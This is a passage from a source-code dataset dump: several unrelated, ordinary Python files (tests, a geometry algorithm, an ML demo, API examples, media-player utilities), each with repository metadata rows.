42.3,
8.1,
38.5,
53.7,
71.43,
16.34,
49.43,
74.35,
51.98,
46.42,
20.01,
69.44,
65.32,
8.83,
55.79,
82.2,
36.93,
83.78,
31.13,
76.93,
67.67,
25.12,
58.04,
79.78,
90.91,
15.26,
61.65,
78.78,
12.99,
],
"$parameter.date_strings.yyyy_mm_dd_date_format.value": "%Y-%m-%d",
"$parameter.date_strings.mm_yyyy_dd_date_format.details": {"confidence": 0.78},
"$parameter.date_strings.yyyy_mm_dd_hh_mm_ss_tz_date_format.details": {
"confidence": 0.78
},
"$parameter.date_strings.tolerances.max_abs_error_time_milliseconds": 100,
"$parameter.tolerances.financial.usd": 1.0,
"$parameter.date_strings.mm_yyyy_dd_hh_mm_ss_tz_date_format.details": {
"confidence": 0.78
},
"$parameter.monthly_taxi_fairs.mean_values.details": {"confidence": "low"},
"$parameter.tolerances.mostly": 0.91,
"$parameter.daily_taxi_fairs.mean_values.value": {
"sunday": 71.43,
"monday": 74.35,
"tuesday": 42.3,
"wednesday": 42.3,
"thursday": 82.2,
"friday": 78.78,
"saturday": 91.39,
},
"$parameter.weekly_taxi_fairs.mean_values.value": [
{
"sunday": 71.43,
"monday": 74.35,
"tuesday": 42.3,
"wednesday": 42.3,
"thursday": 82.2,
"friday": 78.78,
"saturday": 91.39,
},
{
"sunday": 81.43,
"monday": 84.35,
"tuesday": 52.3,
"wednesday": 43.3,
"thursday": 22.2,
"friday": 98.78,
"saturday": 81.39,
},
{
"sunday": 61.43,
"monday": 34.35,
"tuesday": 82.3,
"wednesday": 72.3,
"thursday": 22.2,
"friday": 38.78,
"saturday": 51.39,
},
{
"sunday": 51.43,
"monday": 64.35,
"tuesday": 72.3,
"wednesday": 82.3,
"thursday": 22.2,
"friday": 98.78,
"saturday": 31.39,
},
{
"sunday": 72.43,
"monday": 77.35,
"tuesday": 46.3,
"wednesday": 47.3,
"thursday": 88.2,
"friday": 79.78,
"saturday": 93.39,
},
{
"sunday": 72.43,
"monday": 73.35,
"tuesday": 41.3,
"wednesday": 49.3,
"thursday": 80.2,
"friday": 78.78,
"saturday": 93.39,
},
{
"sunday": 74.43,
"monday": 78.35,
"tuesday": 49.3,
"wednesday": 43.3,
"thursday": 88.2,
"friday": 72.78,
"saturday": 97.39,
},
{
"sunday": 73.43,
"monday": 72.35,
"tuesday": 40.3,
"wednesday": 40.3,
"thursday": 89.2,
"friday": 77.78,
"saturday": 90.39,
},
{
"sunday": 72.43,
"monday": 73.35,
"tuesday": 45.3,
"wednesday": 44.3,
"thursday": 89.2,
"friday": 77.78,
"saturday": 96.39,
},
{
"sunday": 75.43,
"monday": 74.25,
"tuesday": 42.33,
"wednesday": 42.23,
"thursday": 82.21,
"friday": 78.76,
"saturday": 91.37,
},
{
"sunday": 71.43,
"monday": 74.37,
"tuesday": 42.3,
"wednesday": 42.32,
"thursday": 82.23,
"friday": 78.77,
"saturday": 91.49,
},
{
"sunday": 71.63,
"monday": 74.37,
"tuesday": 42.2,
"wednesday": 42.1,
"thursday": 82.29,
"friday": 78.79,
"saturday": 91.39,
},
{
"sunday": 71.42,
"monday": 74.33,
"tuesday": 42.33,
"wednesday": 42.34,
"thursday": 82.25,
"friday": 78.77,
"saturday": 91.69,
},
{
"sunday": 71.44,
"monday": 72.35,
"tuesday": 42.33,
"wednesday": 42.31,
"thursday": 82.29,
"friday": 78.68,
"saturday": 91.49,
},
{
"sunday": 71.44,
"monday": 74.32,
"tuesday": 42.32,
"wednesday": 42.32,
"thursday": 82.29,
"friday": 78.77,
"saturday": 91.49,
},
{
"sunday": 71.44,
"monday": 74.33,
"tuesday": 42.21,
"wednesday": 42.31,
"thursday": 82.27,
"friday": 78.74,
"saturday": 91.49,
},
{
"sunday": 71.33,
"monday": 74.25,
"tuesday": 42.31,
"wednesday": 42.03,
"thursday": 82.02,
"friday": 78.08,
"saturday": 91.38,
},
{
"sunday": 71.41,
"monday": 74.31,
"tuesday": 42.39,
"wednesday": 42.93,
"thursday": 82.92,
"friday": 78.75,
"saturday": 91.49,
},
{
"sunday": 72.43,
"monday": 73.35,
"tuesday": 42.3,
"wednesday": 32.3,
"thursday": 52.2,
"friday": 88.78,
"saturday": 81.39,
},
{
"sunday": 71.43,
"monday": 74.35,
"tuesday": 32.3,
"wednesday": 92.3,
"thursday": 72.2,
"friday": 74.78,
"saturday": 51.39,
},
{
"sunday": 72.43,
"monday": 64.35,
"tuesday": 52.3,
"wednesday": 42.39,
"thursday": 82.28,
"friday": 78.77,
"saturday": 91.36,
},
{
"sunday": 81.43,
"monday": 94.35,
"tuesday": 62.3,
"wednesday": 52.3,
"thursday": 92.2,
"friday": 88.78,
"saturday": 51.39,
},
{
"sunday": 21.43,
"monday": 34.35,
"tuesday": 42.34,
"wednesday": 62.3,
"thursday": 52.2,
"friday": 98.78,
"saturday": 81.39,
},
{
"sunday": 71.33,
"monday": 74.25,
"tuesday": 42.13,
"wednesday": 42.93,
"thursday": 82.82,
"friday": 78.78,
"saturday": 91.39,
},
{
"sunday": 72.43,
"monday": 73.35,
"tuesday": 44.3,
"wednesday": 45.3,
"thursday": 86.2,
"friday": 77.78,
"saturday": 98.39,
},
{
"sunday": 79.43,
"monday": 78.35,
"tuesday": 47.3,
"wednesday": 46.3,
"thursday": 85.2,
"friday": 74.78,
"saturday": 93.39,
},
{
"sunday": 71.42,
"monday": 74.31,
"tuesday": 42.0,
"wednesday": 42.1,
"thursday": 82.23,
"friday": 65.78,
"saturday": 91.26,
},
{
"sunday": 91.43,
"monday": 84.35,
"tuesday": 42.37,
"wednesday": 42.36,
"thursday": 82.25,
"friday": 78.74,
"saturday": 91.32,
},
{
"sunday": 71.33,
"monday": 74.45,
"tuesday": 42.35,
"wednesday": 42.36,
"thursday": 82.27,
"friday": 26.78,
"saturday": 71.39,
},
{
"sunday": 71.53,
"monday": 73.35,
"tuesday": 43.32,
"wednesday": 42.23,
"thursday": 82.32,
"friday": 78.18,
"saturday": 91.49,
},
{
"sunday": 71.53,
"monday": 74.25,
"tuesday": 52.3,
"wednesday": 52.3,
"thursday": 81.23,
"friday": 78.78,
"saturday": 78.39,
},
],
"$parameter.weekly_taxi_fairs.mean_values.details": {
"confidence": "high",
},
"$parameter.date_strings.mm_yyyy_dd_date_format.value": "%m-%Y-%d",
"$parameter.daily_taxi_fairs.mean_values.details": {
"confidence": "medium",
},
"$parameter.date_strings.tolerances.max_num_conversion_attempts": 5,
"$mean": 0.65,
}
parameter_values_for_fully_qualified_parameter_names: Dict[
str, Any
] = get_parameter_values_for_fully_qualified_parameter_names(
domain=domain,
variables=variables,
parameters=parameters,
)
assert (
parameter_values_for_fully_qualified_parameter_names
== expected_parameter_values_for_fully_qualified_parameter_names
)
| 32.198347
| 99
| 0.462718
|
4a15a1babdcb7c77cf47122ef92fc9ad911f3d74
| 901
|
py
|
Python
|
python/src/main/python/pyalink/alink/tests/examples/operator/batch/test_lasso_reg.py
|
wenwei8268/Alink
|
c00702538c95a32403985ebd344eb6aeb81749a7
|
[
"Apache-2.0"
] | null | null | null |
python/src/main/python/pyalink/alink/tests/examples/operator/batch/test_lasso_reg.py
|
wenwei8268/Alink
|
c00702538c95a32403985ebd344eb6aeb81749a7
|
[
"Apache-2.0"
] | null | null | null |
python/src/main/python/pyalink/alink/tests/examples/operator/batch/test_lasso_reg.py
|
wenwei8268/Alink
|
c00702538c95a32403985ebd344eb6aeb81749a7
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import numpy as np
import pandas as pd
from pyalink.alink import *
class TestYuhe(unittest.TestCase):
def test_lasso_reg_op(self):
data = np.array([
[2, 1, 1],
[3, 2, 1],
[4, 3, 2],
[2, 4, 1],
[2, 2, 1],
[4, 3, 2],
[1, 2, 1],
[5, 3, 3]])
df = pd.DataFrame({"f0": data[:, 0],
"f1": data[:, 1],
"label": data[:, 2]})
batchData = dataframeToOperator(df, schemaStr='f0 int, f1 int, label int', op_type='batch')
colnames = ["f0", "f1"]
lasso = LassoRegTrainBatchOp().setLambda(0.1).setFeatureCols(colnames).setLabelCol("label")
model = batchData.link(lasso)
predictor = LassoRegPredictBatchOp().setPredictionCol("pred")
predictor.linkFrom(model, batchData).print()
| 28.15625
| 99
| 0.507214
|
4a15a1d218b7406ee26d7ab656bc06e27087fb41
| 3,540
|
py
|
Python
|
arcade/earclip_module.py
|
markjoshua12/arcade
|
74a8012a001229cee677acbf2a285ef677c8b691
|
[
"MIT"
] | 1
|
2020-01-18T04:48:38.000Z
|
2020-01-18T04:48:38.000Z
|
arcade/earclip_module.py
|
markjoshua12/arcade
|
74a8012a001229cee677acbf2a285ef677c8b691
|
[
"MIT"
] | null | null | null |
arcade/earclip_module.py
|
markjoshua12/arcade
|
74a8012a001229cee677acbf2a285ef677c8b691
|
[
"MIT"
] | null | null | null |
"""
from: https://github.com/linuxlewis/tripy/blob/master/tripy.py
"""
from collections import namedtuple
Point = namedtuple('Point', ['x', 'y'])
def earclip(polygon):
"""
Simple earclipping algorithm for a given polygon p.
polygon is expected to be an array of 2-tuples of the cartesian points of the polygon
For a polygon with n points it will return n-2 triangles.
The triangles are returned as an array of 3-tuples where each item in the tuple is a 2-tuple of the cartesian point.
Implementation Reference:
- https://www.geometrictools.com/Documentation/TriangulationByEarClipping.pdf
"""
ear_vertex = []
triangles = []
polygon = [Point(*point) for point in polygon]
if _is_clockwise(polygon):
polygon.reverse()
point_count = len(polygon)
for i in range(point_count):
prev_index = i - 1
prev_point = polygon[prev_index]
point = polygon[i]
next_index = (i + 1) % point_count
next_point = polygon[next_index]
if _is_ear(prev_point, point, next_point, polygon):
ear_vertex.append(point)
while ear_vertex and point_count >= 3:
ear = ear_vertex.pop(0)
i = polygon.index(ear)
prev_index = i - 1
prev_point = polygon[prev_index]
next_index = (i + 1) % point_count
next_point = polygon[next_index]
polygon.remove(ear)
point_count -= 1
triangles.append(((prev_point.x, prev_point.y), (ear.x, ear.y), (next_point.x, next_point.y)))
if point_count > 3:
prev_prev_point = polygon[prev_index - 1]
next_next_index = (i + 1) % point_count
next_next_point = polygon[next_next_index]
groups = [
(prev_prev_point, prev_point, next_point, polygon),
(prev_point, next_point, next_next_point, polygon)
]
for group in groups:
p = group[1]
if _is_ear(*group):
if p not in ear_vertex:
ear_vertex.append(p)
elif p in ear_vertex:
ear_vertex.remove(p)
return triangles
def _is_clockwise(polygon):
s = 0
polygon_count = len(polygon)
for i in range(polygon_count):
point = polygon[i]
point2 = polygon[(i + 1) % polygon_count]
s += (point2.x - point.x) * (point2.y + point.y)
return s > 0
def _is_convex(prev, point, next_point):
return _triangle_sum(prev.x, prev.y, point.x, point.y, next_point.x, next_point.y) < 0
def _is_ear(p1, p2, p3, polygon):
ear = _contains_no_points(p1, p2, p3, polygon) and \
_is_convex(p1, p2, p3) and \
_triangle_area(p1.x, p1.y, p2.x, p2.y, p3.x, p3.y) > 0
return ear
def _contains_no_points(p1, p2, p3, polygon):
for pn in polygon:
if pn in (p1, p2, p3):
continue
elif _is_point_inside(pn, p1, p2, p3):
return False
return True
def _is_point_inside(p, a, b, c):
area = _triangle_area(a.x, a.y, b.x, b.y, c.x, c.y)
area1 = _triangle_area(p.x, p.y, b.x, b.y, c.x, c.y)
area2 = _triangle_area(p.x, p.y, a.x, a.y, c.x, c.y)
area3 = _triangle_area(p.x, p.y, a.x, a.y, b.x, b.y)
return area == sum([area1, area2, area3])
def _triangle_area(x1, y1, x2, y2, x3, y3):
return abs((x1 * (y2 - y3) + x2 * (y3 - y1) + x3 * (y1 - y2)) / 2.0)
def _triangle_sum(x1, y1, x2, y2, x3, y3):
return x1 * (y3 - y2) + x2 * (y1 - y3) + x3 * (y2 - y1)
| 31.052632
| 120
| 0.591243
|
4a15a1edd9e9b860f6dcbd13ac78aba5b2cf676b
| 786
|
py
|
Python
|
examples/MNISTDemo.py
|
anjapago/pyTsetlinMachine
|
74ab0f4bed8620899ac371ac930ddbab50463b96
|
[
"MIT"
] | 101
|
2019-06-14T13:03:28.000Z
|
2022-03-20T17:01:44.000Z
|
examples/MNISTDemo.py
|
anjapago/pyTsetlinMachine
|
74ab0f4bed8620899ac371ac930ddbab50463b96
|
[
"MIT"
] | 6
|
2019-09-17T06:30:37.000Z
|
2021-07-30T00:12:46.000Z
|
examples/MNISTDemo.py
|
anjapago/pyTsetlinMachine
|
74ab0f4bed8620899ac371ac930ddbab50463b96
|
[
"MIT"
] | 28
|
2019-06-14T12:59:51.000Z
|
2022-03-13T21:43:10.000Z
|
from pyTsetlinMachine.tm import MultiClassTsetlinMachine
import numpy as np
from time import time
from keras.datasets import mnist
(X_train, Y_train), (X_test, Y_test) = mnist.load_data()
X_train = np.where(X_train.reshape((X_train.shape[0], 28*28)) > 75, 1, 0)
X_test = np.where(X_test.reshape((X_test.shape[0], 28*28)) > 75, 1, 0)
tm = MultiClassTsetlinMachine(2000, 50, 10.0)
print("\nAccuracy over 250 epochs:\n")
for i in range(250):
start_training = time()
tm.fit(X_train, Y_train, epochs=1, incremental=True)
stop_training = time()
start_testing = time()
result = 100*(tm.predict(X_test) == Y_test).mean()
stop_testing = time()
print("#%d Accuracy: %.2f%% Training: %.2fs Testing: %.2fs" % (i+1, result, stop_training-start_training, stop_testing-start_testing))
| 31.44
| 135
| 0.71883
|
4a15a237314356cad80f58f570300b1228038e00
| 708
|
py
|
Python
|
audiovisual/indico_audiovisual/views.py
|
plourenco/indico-plugins-cern
|
5be71a552825afdd93a3bc7e7141335b8559c41a
|
[
"MIT"
] | null | null | null |
audiovisual/indico_audiovisual/views.py
|
plourenco/indico-plugins-cern
|
5be71a552825afdd93a3bc7e7141335b8559c41a
|
[
"MIT"
] | null | null | null |
audiovisual/indico_audiovisual/views.py
|
plourenco/indico-plugins-cern
|
5be71a552825afdd93a3bc7e7141335b8559c41a
|
[
"MIT"
] | null | null | null |
# This file is part of the CERN Indico plugins.
# Copyright (C) 2014 - 2020 CERN
#
# The CERN Indico plugins are free software; you can redistribute
# them and/or modify them under the terms of the MIT License; see
# the LICENSE file for more details.
from __future__ import unicode_literals
from indico.core.plugins import WPJinjaMixinPlugin
from indico.web.breadcrumbs import render_breadcrumbs
from indico.web.views import WPDecorated
from indico_audiovisual import _
class WPAudiovisualManagers(WPJinjaMixinPlugin, WPDecorated):
def _get_breadcrumbs(self):
return render_breadcrumbs(_('Webcast/Recording'))
def _get_body(self, params):
return self._get_page_content(params)
| 30.782609
| 65
| 0.785311
|
4a15a24fb59621e1303318d22788608bb02ae4d8
| 1,782
|
py
|
Python
|
tests/image/convolution_test.py
|
sophiaas/e3nn
|
92351b9225df7aeaf70fdc124c7b0e566d4c0eda
|
[
"MIT"
] | 1
|
2021-01-11T18:34:39.000Z
|
2021-01-11T18:34:39.000Z
|
tests/image/convolution_test.py
|
sophiaas/e3nn
|
92351b9225df7aeaf70fdc124c7b0e566d4c0eda
|
[
"MIT"
] | null | null | null |
tests/image/convolution_test.py
|
sophiaas/e3nn
|
92351b9225df7aeaf70fdc124c7b0e566d4c0eda
|
[
"MIT"
] | null | null | null |
# pylint: disable=not-callable, no-member, invalid-name, line-too-long, wildcard-import, unused-wildcard-import, missing-docstring, protected-access
import pytest
import torch
from e3nn import rs
from e3nn.image.convolution import Convolution
@pytest.mark.parametrize('fuzzy_pixels', [False, True])
def test_equivariance(fuzzy_pixels):
torch.set_default_dtype(torch.float64)
f = torch.nn.Sequential(
Convolution(
Rs_in=[0],
Rs_out=[0, 0, 1, 1, 2],
size=5,
steps=(0.5, 0.5, 0.9),
fuzzy_pixels=fuzzy_pixels
),
Convolution(
Rs_in=[0, 0, 1, 1, 2],
Rs_out=[0],
size=5,
steps=(0.5, 0.5, 0.9),
fuzzy_pixels=fuzzy_pixels
),
)
def rotate(t):
# rotate 90 degrees in plane of axes 1 and 2
return t.flip(1).transpose(1, 2)
def unrotate(t):
# undo the rotation by 3 more rotations
return rotate(rotate(rotate(t)))
inp = torch.randn(2, 16, 16, 16, 1)
inp_r = rotate(inp)
diff_inp = (inp - unrotate(inp_r)).abs().max().item()
assert diff_inp < 1e-10 # sanity check
out = f(inp)
out_r = f(inp_r)
diff_out = (out - unrotate(out_r)).abs().max().item()
assert diff_out < 1e-1 if fuzzy_pixels else 1e-10
@pytest.mark.parametrize('fuzzy_pixels', [False, True])
def test_normalization(fuzzy_pixels):
batch = 3
size = 5
input_size = 15
Rs_in = [(20, 0), (20, 1), (10, 2)]
Rs_out = [0, 1, 2]
conv = Convolution(Rs_in, Rs_out, size, lmax=2, fuzzy_pixels=fuzzy_pixels)
x = rs.randn(batch, input_size, input_size, input_size, Rs_in)
y = conv(x)
assert y.shape[-1] == rs.dim(Rs_out)
assert y.var().log10().abs() < 1.5
| 27
| 148
| 0.59596
|
4a15a2cb792fd88a139b1cd0f34c72ac58e66737
| 2,155
|
py
|
Python
|
examples/adwords/v201806/basic_operations/remove_keyword.py
|
christineyi3898/googleads-python-lib
|
cd707dc897b93cf1bbb19355f7424e7834e7fb55
|
[
"Apache-2.0"
] | 2
|
2019-07-11T13:01:56.000Z
|
2019-07-11T13:01:58.000Z
|
examples/adwords/v201806/basic_operations/remove_keyword.py
|
SoungMo/googleads-python-lib
|
fe86335c416e0571328c0a481c4b0cff863c01d9
|
[
"Apache-2.0"
] | null | null | null |
examples/adwords/v201806/basic_operations/remove_keyword.py
|
SoungMo/googleads-python-lib
|
fe86335c416e0571328c0a481c4b0cff863c01d9
|
[
"Apache-2.0"
] | 1
|
2019-10-21T04:10:51.000Z
|
2019-10-21T04:10:51.000Z
|
#!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example deletes an ad group criterion using the 'REMOVE' operator.
To get ad group criteria, run get_keywords.py.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
"""
from googleads import adwords
AD_GROUP_ID = 'INSERT_AD_GROUP_ID_HERE'
CRITERION_ID = 'INSERT_CRITERION_ID_HERE'
def main(client, ad_group_id, criterion_id):
# Initialize appropriate service.
ad_group_criterion_service = client.GetService(
'AdGroupCriterionService', version='v201806')
# Construct operations and delete ad group criteria.
operations = [
{
'operator': 'REMOVE',
'operand': {
'xsi_type': 'BiddableAdGroupCriterion',
'adGroupId': ad_group_id,
'criterion': {
'id': criterion_id
}
}
}
]
result = ad_group_criterion_service.mutate(operations)
# Display results.
for criterion in result['value']:
print ('Ad group criterion with ad group id "%s", criterion id "%s", '
'and type "%s" was deleted.'
% (criterion['adGroupId'], criterion['criterion']['id'],
criterion['criterion']['Criterion.Type']))
if __name__ == '__main__':
# Initialize client object.
adwords_client = adwords.AdWordsClient.LoadFromStorage()
main(adwords_client, AD_GROUP_ID, CRITERION_ID)
| 31.691176
| 77
| 0.697448
|
4a15a352db763b40def66f138c7d0ce317ec0ab2
| 4,541
|
py
|
Python
|
plex_mpv_shim/utils.py
|
romosborne/plex-mpv-shim
|
a454459e6a5b584f40841331604c8bfdf26d6c51
|
[
"MIT"
] | 231
|
2019-08-18T06:25:17.000Z
|
2022-03-28T08:35:50.000Z
|
plex_mpv_shim/utils.py
|
romosborne/plex-mpv-shim
|
a454459e6a5b584f40841331604c8bfdf26d6c51
|
[
"MIT"
] | 64
|
2019-08-18T00:40:36.000Z
|
2022-03-30T07:05:38.000Z
|
plex_mpv_shim/utils.py
|
romosborne/plex-mpv-shim
|
a454459e6a5b584f40841331604c8bfdf26d6c51
|
[
"MIT"
] | 20
|
2019-08-19T21:02:36.000Z
|
2022-03-12T15:07:38.000Z
|
import logging
import os
import urllib.request, urllib.parse, urllib.error
import socket
import ipaddress
import uuid
import re
import sys
from .conf import settings
from datetime import datetime
from functools import wraps
PLEX_TOKEN_RE = re.compile("(token|X-Plex-Token)=[^&]*")
log = logging.getLogger("utils")
plex_eph_tokens = {}
plex_sessions = {}
plex_transcode_sessions = {}
class Timer(object):
def __init__(self):
self.restart()
def restart(self):
self.started = datetime.now()
def elapsedMs(self):
return self.elapsed() * 1e3
def elapsed(self):
return (datetime.now()-self.started).total_seconds()
def synchronous(tlockname):
"""
A decorator to place an instance based lock around a method.
From: http://code.activestate.com/recipes/577105-synchronization-decorator-for-class-methods/
"""
def _synched(func):
@wraps(func)
def _synchronizer(self,*args, **kwargs):
tlock = self.__getattribute__( tlockname)
tlock.acquire()
try:
return func(self, *args, **kwargs)
finally:
tlock.release()
return _synchronizer
return _synched
def upd_token(domain, token):
plex_eph_tokens[domain] = token
def get_transcode_session(domain, create=True):
if domain not in plex_transcode_sessions:
if not create:
return
session = str(uuid.uuid4())
plex_transcode_sessions[domain] = session
return plex_transcode_sessions[domain]
def clear_transcode_session(domain):
if domain in plex_transcode_sessions:
del plex_transcode_sessions[domain]
def get_session(domain):
if domain not in plex_sessions:
session = str(uuid.uuid4())
plex_sessions[domain] = session
return plex_sessions[domain]
def get_plex_url(url, data=None, quiet=False):
if not data:
data = {}
parsed_url = urllib.parse.urlsplit(url)
domain = parsed_url.hostname
if parsed_url.scheme != "https" and not settings.allow_http:
raise ValueError("HTTP is not enabled in the configuration.")
if domain in plex_eph_tokens:
data.update({
"X-Plex-Token": plex_eph_tokens[domain]
})
else:
log.error("get_plex_url No token for: %s" % domain)
data.update({
"X-Plex-Version": "2.0",
"X-Plex-Client-Identifier": settings.client_uuid,
"X-Plex-Provides": "player",
"X-Plex-Device-Name": settings.player_name,
"X-Plex-Model": "RaspberryPI",
"X-Plex-Device": "RaspberryPI",
"X-Plex-Session-Identifier": get_session(domain),
# Lies
"X-Plex-Product": "Plex MPV Shim",
"X-Plex-Platform": "Plex Home Theater",
"X-Plex-Client-Profile-Name": settings.client_profile,
})
# Kinda ghetto...
sep = "?"
if sep in url:
sep = "&"
if data:
url = "%s%s%s" % (url, sep, urllib.parse.urlencode(data))
if not quiet:
log.debug("get_plex_url Created URL: %s" % sanitize_msg(url))
return url
def safe_urlopen(url, data=None, quiet=False):
"""
Opens a url and returns True if an HTTP 200 code is returned,
otherwise returns False.
"""
if not data:
data = {}
url = get_plex_url(url, data, quiet)
try:
page = urllib.request.urlopen(url)
if page.code == 200:
return True
log.error("Error opening URL '%s': page returned %d" % (sanitize_msg(url),
page.code))
except Exception as e:
log.error("Error opening URL '%s': %s" % (sanitize_msg(url), e))
return False
def is_local_domain(domain):
return ipaddress.ip_address(socket.gethostbyname(domain)).is_private
def sanitize_msg(text):
if settings.sanitize_output:
return re.sub(PLEX_TOKEN_RE, "\\1=REDACTED", text)
return text
def mpv_color_to_plex(color):
return '#'+color.lower()[3:]
def plex_color_to_mpv(color):
return '#FF'+color.upper()[1:]
def get_resource(*path):
# Detect if bundled via pyinstaller.
# From: https://stackoverflow.com/questions/404744/
if getattr(sys, '_MEIPASS', False):
application_path = os.path.join(sys._MEIPASS, "plex_mpv_shim")
else:
application_path = os.path.dirname(os.path.abspath(__file__))
return os.path.join(application_path, *path)
| 28.030864
| 97
| 0.62211
|
4a15a40433bbc8d5b38312bbc0045eafe68fb949
| 484
|
py
|
Python
|
aoc/day02_2.py
|
GitOnUp/Advent2021
|
c9cd5a2d38a09389bdecac5f45be854da7aacee8
|
[
"MIT"
] | null | null | null |
aoc/day02_2.py
|
GitOnUp/Advent2021
|
c9cd5a2d38a09389bdecac5f45be854da7aacee8
|
[
"MIT"
] | null | null | null |
aoc/day02_2.py
|
GitOnUp/Advent2021
|
c9cd5a2d38a09389bdecac5f45be854da7aacee8
|
[
"MIT"
] | null | null | null |
from aoc.day02_1 import yield_lines
def run():
aim = 0
depth = 0
horizontal = 0
for direction, value in yield_lines():
if direction == 'forward':
horizontal += value
depth += aim * value
elif direction == 'down':
aim += value
elif direction == 'up':
aim -= value
else:
raise ValueError("Bad line")
return horizontal * depth
if __name__ == "__main__":
print(run())
| 21.043478
| 42
| 0.52686
|
4a15a5a870f96c1d003dff3a367dcde30d4d86d3
| 3,979
|
py
|
Python
|
mtcnn_pb2.py
|
reasonsolo/mtcnn_caffe
|
ec646c8e27af900da1380d5968970705f9e8f582
|
[
"MIT"
] | null | null | null |
mtcnn_pb2.py
|
reasonsolo/mtcnn_caffe
|
ec646c8e27af900da1380d5968970705f9e8f582
|
[
"MIT"
] | null | null | null |
mtcnn_pb2.py
|
reasonsolo/mtcnn_caffe
|
ec646c8e27af900da1380d5968970705f9e8f582
|
[
"MIT"
] | 1
|
2019-01-15T05:56:06.000Z
|
2019-01-15T05:56:06.000Z
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: mtcnn.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='mtcnn.proto',
package='',
syntax='proto2',
serialized_options=None,
serialized_pb=_b('\n\x0bmtcnn.proto\"b\n\x05\x44\x61tum\x12\x0b\n\x03img\x18\x01 \x01(\x0c\x12\r\n\x05label\x18\x02 \x01(\x05\x12\x0c\n\x04\x62\x62ox\x18\x03 \x03(\x02\x12\x0e\n\x06landm5\x18\x04 \x03(\x02\x12\t\n\x01w\x18\x05 \x01(\x05\x12\t\n\x01h\x18\x06 \x01(\x05\x12\t\n\x01\x63\x18\x07 \x01(\x05')
)
_DATUM = _descriptor.Descriptor(
name='Datum',
full_name='Datum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='img', full_name='Datum.img', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='label', full_name='Datum.label', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='bbox', full_name='Datum.bbox', index=2,
number=3, type=2, cpp_type=6, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='landm5', full_name='Datum.landm5', index=3,
number=4, type=2, cpp_type=6, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='w', full_name='Datum.w', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='h', full_name='Datum.h', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='c', full_name='Datum.c', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=15,
serialized_end=113,
)
DESCRIPTOR.message_types_by_name['Datum'] = _DATUM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Datum = _reflection.GeneratedProtocolMessageType('Datum', (_message.Message,), dict(
DESCRIPTOR = _DATUM,
__module__ = 'mtcnn_pb2'
# @@protoc_insertion_point(class_scope:Datum)
))
_sym_db.RegisterMessage(Datum)
# @@protoc_insertion_point(module_scope)
| 35.526786
| 305
| 0.723046
|
4a15a6bae52d6a6586d909db70e48e2d696c645b
| 6,621
|
py
|
Python
|
py/add_card.py
|
Apop85/Lernkarten
|
ff092f4f856d50b56802333ad599789bbc0fb387
|
[
"MIT"
] | null | null | null |
py/add_card.py
|
Apop85/Lernkarten
|
ff092f4f856d50b56802333ad599789bbc0fb387
|
[
"MIT"
] | null | null | null |
py/add_card.py
|
Apop85/Lernkarten
|
ff092f4f856d50b56802333ad599789bbc0fb387
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
####
# File: search_all.py
# Project: py
#-----
# Created Date: Thursday 08.08.2019, 23:52
# Author: rbald
#-----
# Last Modified: Tuesday 19.10.2021, 18:24
#-----
# Copyright (c) 2019 rbald
# This software is published under the MIT license.
# Check http://www.opensource.org/licenses/MIT for further informations
#-----
# Description: Search working directory for docx files and get Questions out of them
####
try:
import os, docx, hashlib
from sys import argv
except:
print("<div class='output_message error'>Fehlendes Pythonmodul: python-docx</div>")
exit()
DEBUG = True
def get_root():
# Konfigurationsdatei einlesen
os.chdir(os.path.dirname(__file__))
rel_dir = "../conf/cards.ini"
file_reader = open(rel_dir, 'r')
file_content = file_reader.readlines()
file_reader.close()
for line in file_content:
if "ROOT_PATH" in line:
ROOT_PATH = line.lstrip('ROOT_PATH="')
ROOT_PATH = ROOT_PATH.rstrip('"\n')
elif "DOK_PATH" in line:
